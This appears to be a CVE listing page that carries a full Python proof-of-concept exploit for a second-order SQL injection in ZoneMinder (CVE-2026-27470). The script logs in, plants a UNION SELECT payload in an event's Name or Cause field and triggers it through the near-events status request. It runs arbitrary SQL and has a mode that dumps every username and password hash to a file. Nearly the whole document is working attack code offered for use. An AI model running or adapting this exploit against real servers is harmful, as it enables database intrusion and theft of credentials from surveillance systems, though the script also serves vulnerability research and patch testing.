5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in          : 1.36.38 / 1.38.1
Vulnerable file   : web/ajax/status.php -> getNearEvents()
Author            : d3vn0mi

LEGAL DISCLAIMER:
This tool is for educational and authorized security research purposes only.
Do not use against systems you do not own or have explicit written permission
to test.

Usage:
  python3 poc.py -t http://10.10.10.10 -u admin -p password
  python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
  python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o creds.txt
"""

import argparse
import logging
import os
import re
import sys
from datetime import datetime

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ---------------------------------------------------------------------------
# ANSI colors (no external deps)
# ---------------------------------------------------------------------------
class _C:
    """ANSI escape sequences used to colorize console output."""
    RESET  = "\033[0m"
    BOLD   = "\033[1m"
    RED    = "\033[91m"
    GREEN  = "\033[92m"
    YELLOW = "\033[93m"
    CYAN   = "\033[96m"


# When stdout is piped or redirected, blank every escape code so captured
# output contains no control sequences.
if not sys.stdout.isatty():
    # Snapshot the names first: the class namespace is modified in the loop.
    for attr in [name for name in vars(_C) if name.isupper()]:
        setattr(_C, attr, "")


def _tagged(color, tag, msg):
    """Print *msg* behind a bracketed *tag* rendered in *color*."""
    print(f"{color}[{tag}]{_C.RESET} {msg}")


def _ok(msg):
    """Report a successful step (``[+]`` prefix in _C.GREEN)."""
    _tagged(_C.GREEN, "+", msg)


def _fail(msg):
    """Report a failed step (``[-]`` prefix in _C.RED)."""
    _tagged(_C.RED, "-", msg)


def _info(msg):
    """Report progress or neutral information (``[*]`` prefix in _C.YELLOW)."""
    _tagged(_C.YELLOW, "*", msg)


# Startup banner printed once by main(). The f-string is evaluated at import
# time, after the isatty() check above, so the color codes interpolated here
# are already empty strings when stdout is not a terminal.
BANNER = f"""{_C.CYAN}{_C.BOLD}
╔══════════════════════════════════════════════════════════════╗
║   CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC         ║
║   CVSS 8.8 │ Authenticated │ Events Permission               ║
║                                                              ║
║   Author: d3vn0mi                                            ║
╚══════════════════════════════════════════════════════════════╝{_C.RESET}
"""

# Module-level logger. main() configures the root level: DEBUG with -v,
# WARNING otherwise.
log = logging.getLogger("cve-2026-27470")

# ---------------------------------------------------------------------------
# Exit codes
# ---------------------------------------------------------------------------
# Process exit statuses passed to sys.exit() by main() and run_exploit().
EXIT_OK           = 0  # run finished normally
EXIT_AUTH_FAIL    = 1  # login() returned False
EXIT_NO_EVENTS    = 2  # no event ID was supplied and none could be discovered
EXIT_INJECT_FAIL  = 3  # inject_payload() returned False
EXIT_CONN_ERROR   = 4  # a network-level error from requests was caught

# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------

def _extract_csrf(text):
    """Return the csrf-magic token embedded in *text*, or ``None``.

    Two locations are tried in order: a ``csrfMagicToken = "..."`` script
    assignment, then a tag carrying ``name="__csrf_magic"`` followed by a
    ``value="..."`` attribute. The first match wins.
    """
    patterns = (
        r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']',
        r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']',
    )
    for pattern in patterns:
        found = re.search(pattern, text)
        if found is not None:
            return found.group(1)
    return None


def _build_session(proxy=None, timeout=30):
    """Build the ``requests.Session`` shared by every request of one run.

    proxy   -- optional proxy URL, applied to both http and https traffic.
    timeout -- default per-request timeout in seconds, read by _get()/_post().

    Certificate verification is switched off on the session. Two ad-hoc
    attributes are attached for the rest of the script: ``_timeout`` and
    ``_zm_csrf`` (the current CSRF token, initially ``None``).
    """
    sess = requests.Session()
    sess.verify = False
    sess.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64)"
    if proxy:
        sess.proxies = dict(http=proxy, https=proxy)
    sess._timeout = timeout
    sess._zm_csrf = None
    return sess


def _get(session, url, **kwargs):
    """Issue a GET through *session* using its default timeout.

    A ``timeout`` passed by the caller takes precedence over
    ``session._timeout``. Nothing is caught here: exceptions raised by the
    request propagate to the caller.
    """
    return session.get(url, **{"timeout": session._timeout, **kwargs})


def _post(session, url, **kwargs):
    """Issue a POST through *session* using its default timeout.

    A ``timeout`` passed by the caller takes precedence over
    ``session._timeout``. Nothing is caught here: exceptions raised by the
    request propagate to the caller.
    """
    return session.post(url, **{"timeout": session._timeout, **kwargs})

# ---------------------------------------------------------------------------
# Core functions
# ---------------------------------------------------------------------------

def login(session, target, username, password):
    """
    Log in to ZoneMinder and prime *session* with its cookie and CSRF token.

    The landing page is fetched first to pick up a CSRF token. If that
    request ends on a URL containing "privacy", authentication is taken to
    be disabled (ZM_OPT_USE_AUTH=0) and no credentials are sent.

    Returns True when the session looks authenticated, False otherwise.
    Success is judged heuristically: the login response mentions "logout"
    or lands on a "console" URL, or a follow-up request for the console view
    returns 200 without being sent to a "login" URL.
    """
    landing = _get(session, f"{target}/", allow_redirects=True)
    session._zm_csrf = _extract_csrf(landing.text)

    # Auth disabled — nothing to submit.
    if "privacy" in landing.url:
        _info("ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
        return True

    form = dict(view="login", action="login",
                username=username, password=password)
    if session._zm_csrf:
        form["__csrf_magic"] = session._zm_csrf

    reply = _post(session, f"{target}/index.php", data=form,
                  allow_redirects=True)

    # Prefer the token from the post-login page; keep the old one if the
    # page carries none.
    session._zm_csrf = _extract_csrf(reply.text) or session._zm_csrf

    if "logout" in reply.text.lower() or "console" in reply.url:
        return True

    if reply.status_code not in (200, 302):
        return False

    # Inconclusive response: probe the console view directly.
    console = _get(session, f"{target}/index.php?view=console",
                   allow_redirects=True)
    return console.status_code == 200 and "login" not in console.url


def get_event_id(session, target):
    """Ask the status endpoint for one event and return its ID.

    Requests a single event sorted ascending by Id. Returns the "Id" (or
    "id") of the first entry under "results", or ``None`` when the list is
    empty or the response cannot be parsed (the failure is logged at DEBUG).
    """
    query = dict(request="status", entity="events",
                 sort_field="Id", sort_asc="1", limit="1")
    resp = _get(session, f"{target}/index.php", params=query)
    try:
        rows = resp.json().get("results", [])
        if rows:
            first = rows[0]
            return first.get("Id") or first.get("id")
    except Exception:
        log.debug("Failed to parse event list response: %s", resp.text[:200])
    return None


def inject_payload(session, target, event_id, payload, field="Name"):
    """
    Phase 1 — Write the malicious payload into the event Name or Cause field.
    ZoneMinder uses a parameterized query here so the payload is stored safely.

    field selects the request shape: "Name" sends a ``rename`` action, any
    other value sends an ``edit`` action that sets Cause (and sets Notes to
    "poc"). The session's CSRF token is included when one is known.

    Returns True when the server answers HTTP 200, False otherwise.
    NOTE(review): only the status code is checked; the response body is
    logged at DEBUG but not inspected for an application-level error.
    """
    csrf = session._zm_csrf

    if field == "Name":
        data = {
            "request": "event",
            "action": "rename",
            "id": event_id,
            "eventName": payload,
        }
    else:  # Cause
        data = {
            "request": "event",
            "action": "edit",
            "id": event_id,
            "newEvent[Cause]": payload,
            "newEvent[Notes]": "poc",
        }

    if csrf:
        data["__csrf_magic"] = csrf

    resp = _post(session, f"{target}/index.php", data=data)
    log.debug("inject_payload response: %d %s", resp.status_code, resp.text[:200])
    return resp.status_code == 200


def trigger_sqli(session, target, event_id, field="Name"):
    """
    Phase 2 — Trigger second-order injection via getNearEvents().
    The stored payload is read from the DB and concatenated unsafely into SQL.

    Sends a GET for the ``nearevents`` status entity of *event_id* with
    *field* as the sort field (presumably so the column holding the payload
    takes part in the server-side query). Returns the raw response object;
    interpreting it is left to the caller.
    """
    params = {
        "request": "status",
        "entity": "nearevents",
        "id": event_id,
        "sort_field": field,
        "sort_asc": "1",
    }
    return _get(session, f"{target}/index.php", params=params)


def restore_event_name(session, target, event_id, original_name="Event"):
    """Rename the carrier event so the payload is no longer stored as its name.

    Sends a ``rename`` action setting the event name to *original_name*,
    including the session's CSRF token when one is known. The response is
    not checked and nothing is returned.

    NOTE(review): the event's real name is never read beforehand, so callers
    relying on the default overwrite it with the literal "Event". Only the
    name is rewritten; a payload written to the Cause field is left in place.
    """
    csrf = session._zm_csrf
    data = {
        "request": "event",
        "action": "rename",
        "id": event_id,
        "eventName": original_name,
    }
    if csrf:
        data["__csrf_magic"] = csrf
    _post(session, f"{target}/index.php", data=data)

def _parse_result(resp):
    """Pull a single value out of the status response, as a string.

    Lookup order:
      1. the first truthy of NextEventId / PrevEventId / NextEventStartTime
         under "nearevents";
      2. "Id" or "StartDateTime" of the first entry under "results" (or
         under "data" when there is no "results" key);
      3. ``str()`` of the whole decoded document.
    If decoding or any lookup raises, the first 500 characters of the raw
    body are returned instead.
    """
    try:
        doc = resp.json()

        near = doc.get("nearevents", {})
        if near:
            wanted = ("NextEventId", "PrevEventId", "NextEventStartTime")
            for candidate in map(near.get, wanted):
                if candidate:
                    return str(candidate)

        rows = doc.get("results", doc.get("data", []))
        if rows:
            first = rows[0]
            candidate = first.get("Id") or first.get("StartDateTime")
            if candidate:
                return str(candidate)

        return str(doc)
    except Exception:
        return resp.text[:500]

def run_exploit(target, username, password, sql_query, field="Name",
                restore=True, manual_event_id=None, proxy=None, timeout=30):
    """Execute one injection cycle and return the extracted value.

    Steps: build a session, log in, pick a carrier event (manual_event_id or
    the first one reported by get_event_id()), store the payload in *field*,
    request the near-events status to trigger it, parse the response, and
    finally rename the event again unless *restore* is False.

    Returns the string produced by _parse_result().

    This function does not raise on failure; it terminates the process:
      EXIT_AUTH_FAIL   -- login() returned False
      EXIT_NO_EVENTS   -- no event ID available
      EXIT_INJECT_FAIL -- inject_payload() returned False
      EXIT_CONN_ERROR  -- any requests.RequestException (connection refused,
                          timeout, ...) at any step. Catching the base class
                          keeps such errors from surfacing as a traceback,
                          whose exit status 1 would be indistinguishable
                          from EXIT_AUTH_FAIL.
    """
    session = _build_session(proxy=proxy, timeout=timeout)

    _info(f"Target  : {target}")
    _info(f"User    : {username}")
    _info(f"Query   : {sql_query}")
    print()

    try:
        # Step 1 — Authenticate
        _info("Logging in...")
        if not login(session, target, username, password):
            _fail("Login failed. Check credentials.")
            sys.exit(EXIT_AUTH_FAIL)
        _ok("Session established.")

        # Step 2 — Get event ID
        if manual_event_id:
            event_id = manual_event_id
            _ok(f"Event ID (manual): {event_id}")
        else:
            _info("Looking for an event ID...")
            event_id = get_event_id(session, target)
            if not event_id:
                _fail("No events found. Specify one manually with --event-id.")
                sys.exit(EXIT_NO_EVENTS)
            _ok(f"Event ID: {event_id}")

        # Step 3 — Build UNION-based payload
        # Events.Name is varchar(64) — keep payloads under 63 chars
        # UNION SELECT requires 2 columns (Id, StartDateTime)
        union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"
        _info(f"Injecting payload into '{field}' field...")
        if not inject_payload(session, target, event_id, union_payload, field=field):
            _fail("Failed to write payload. Check permissions.")
            sys.exit(EXIT_INJECT_FAIL)
        _ok("Payload stored via parameterized query — looks clean in the DB.")

        try:
            # Step 4 — Trigger second-order injection
            _info("Triggering second-order injection...")
            resp = trigger_sqli(session, target, event_id, field=field)
            log.debug("trigger response: HTTP %d", resp.status_code)
            _info(f"HTTP {resp.status_code}")

            result = _parse_result(resp)
        finally:
            # Step 5 — Cleanup
            # Runs even when the trigger request fails, so the target's
            # event record is not left holding the payload.
            # NOTE(review): restore_event_name() always rewrites the Name
            # field with its default placeholder, whatever *field* was used.
            if restore:
                restore_event_name(session, target, event_id)
                _info("Event name restored.")
    except requests.RequestException as exc:
        _fail(f"Connection error: {exc}")
        sys.exit(EXIT_CONN_ERROR)

    return result


def _write_output(filepath, content):
    """Append *content* to *filepath* and report the absolute path written."""
    with open(filepath, "a") as out:
        out.write(content)
    saved_to = os.path.abspath(filepath)
    _ok(f"Results saved to {saved_to}")

# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main():
    """Parse the command line and run a single query or the user dump.

    Without --dump-users, one run_exploit() cycle executes --query, prints
    the result and, when -o is given, appends it to that file.

    With --dump-users, the user count is queried first, then up to ten rows
    are read one at a time (username, then password hash) and written as
    ``username:hash`` lines to the output file (default: dumped_creds.txt).

    Ends with sys.exit(EXIT_OK); failures inside run_exploit() exit earlier
    with their own status.
    """
    # Local import: only the dump header needs it.
    from datetime import timezone

    print(BANNER)

    parser = argparse.ArgumentParser(
        description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
    )
    parser.add_argument("-t", "--target",   required=True,
                        help="Target URL (e.g. http://10.10.10.10)")
    parser.add_argument("-u", "--username", required=True,
                        help="ZoneMinder username")
    parser.add_argument("-p", "--password", required=True,
                        help="ZoneMinder password")
    parser.add_argument("--event-id",      type=int,
                        help="Event ID to use as injection carrier")
    parser.add_argument("--field",         default="Name",
                        choices=["Name", "Cause"],
                        help="Injection field (default: Name)")
    parser.add_argument("--query",         default="SELECT VERSION()",
                        help="SQL query to execute (default: SELECT VERSION())")
    parser.add_argument("--dump-users",    action="store_true",
                        help="Dump all usernames and password hashes")
    parser.add_argument("-o", "--output",  default=None,
                        help="Save results to file (default: dumped_creds.txt for --dump-users)")
    parser.add_argument("--no-restore",    action="store_true",
                        help="Do not restore the event name after exploitation")
    parser.add_argument("--proxy",         default=None,
                        help="HTTP proxy (e.g. http://127.0.0.1:8080)")
    parser.add_argument("--timeout",       type=int, default=30,
                        help="Request timeout in seconds (default: 30)")
    parser.add_argument("-v", "--verbose",  action="store_true",
                        help="Enable debug logging")

    args = parser.parse_args()
    target = args.target.rstrip("/")
    eid = args.event_id
    restore = not args.no_restore

    if args.verbose:
        logging.basicConfig(level=logging.DEBUG,
                            format="%(asctime)s %(name)s %(levelname)s: %(message)s")
    else:
        logging.basicConfig(level=logging.WARNING)

    # Keyword arguments shared by every run_exploit() call below.
    common = dict(
        field=args.field,
        restore=restore,
        manual_event_id=eid,
        proxy=args.proxy,
        timeout=args.timeout,
    )

    if args.dump_users:
        output_path = args.output or "dumped_creds.txt"
        _info("Mode: User dump")

        count_result = run_exploit(
            target, args.username, args.password,
            "SELECT COUNT(*) FROM Users", **common,
        )
        print(f"\n{_C.BOLD}[+] User count: {count_result}{_C.RESET}\n")

        # Write header. datetime.utcnow() is deprecated since Python 3.12;
        # take an aware UTC time and drop tzinfo so the text keeps the
        # original "<naive ISO timestamp>Z" form.
        stamp = datetime.now(timezone.utc).replace(tzinfo=None).isoformat()
        header = (
            f"# CVE-2026-27470 — ZoneMinder credential dump\n"
            f"# Target : {target}\n"
            f"# Date   : {stamp}Z\n"
            f"# Format : username:hash\n\n"
        )
        # The file holds password hashes: when it is newly created, make it
        # owner-readable only instead of relying on the process umask.
        # UTF-8 is explicit so non-ASCII values do not depend on the locale.
        fd = os.open(output_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            fh.write(header)

        creds_found = 0
        for i in range(10):
            uname = run_exploit(
                target, args.username, args.password,
                f"SELECT Username FROM Users LIMIT {i},1", **common,
            )
            uname_str = str(uname) if uname else ""
            # Stop at the first row that yields no usable value. A "{" means
            # _parse_result() fell back to the repr of the whole document.
            # NOTE(review): "None" and "1" are treated as sentinels too;
            # confirm against real responses.
            if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
                break

            passwd = run_exploit(
                target, args.username, args.password,
                f"SELECT Password FROM Users LIMIT {i},1", **common,
            )

            line = f"{uname}:{passwd}"
            _ok(f"User {i + 1}: {line}")
            with open(output_path, "a", encoding="utf-8") as fh:
                fh.write(line + "\n")
            creds_found += 1

        if creds_found:
            print()
            _ok(f"{creds_found} credential(s) saved to {os.path.abspath(output_path)}")
        else:
            _fail("No credentials extracted.")

    else:
        result = run_exploit(
            target, args.username, args.password, args.query, **common,
        )
        print(f"\n{_C.BOLD}[+] Result: {result}{_C.RESET}\n")

        if args.output:
            _write_output(args.output, result + "\n")

    sys.exit(EXIT_OK)


if __name__ == "__main__":
    main()